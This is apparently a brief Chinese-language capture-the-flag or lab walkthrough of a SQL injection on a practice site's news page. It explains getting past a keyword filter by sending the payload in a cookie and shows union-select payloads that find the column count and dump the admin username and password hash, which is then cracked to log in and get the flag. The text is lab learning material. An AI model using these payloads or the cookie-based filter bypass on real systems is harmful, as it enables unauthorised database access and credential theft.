1,随便选择一则新闻,同样判断是否存在SQL注入发现存在and update delete ; insert mid master限制
and update delete ; insert mid master 等非法字符!
http://kypt8004.ia.aqlab.cn/shownews.asp?id=171 order by 2可以先判断字段数,存在十个字段
2,关键字拦截,可以尝试在cookie中传入,注意空格要用+代替,使用插件Modhearder可以改变cookie
首先在值的位置输入id=171+union+select+1,2,3,4,5,6,7,8,9,10数据库报错,再次尝试id=171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin是否存在admin表,存在admin在数据库中,并且23789五处回显点。
3,(查的其他破解方法好像都是直接知道列名是username和password的,不知道咋出来的列名,information_schema表格无法查询,只能查询admin)查找username和password列id=171+union+select+1,username,password,4,5,6,7,8,9,10+from+admin
username为admin,password为b9a2a2b5dffb918cb9a2a2b5dffb918c flag错误,进行解密
welcome,welcome也提交失败,尝试别的方法welcome是password可以扫一下是否有登录页面
存在登录页面,输入账号,密码
拿到flag是zkz{welcome-control}
通关成功!!!!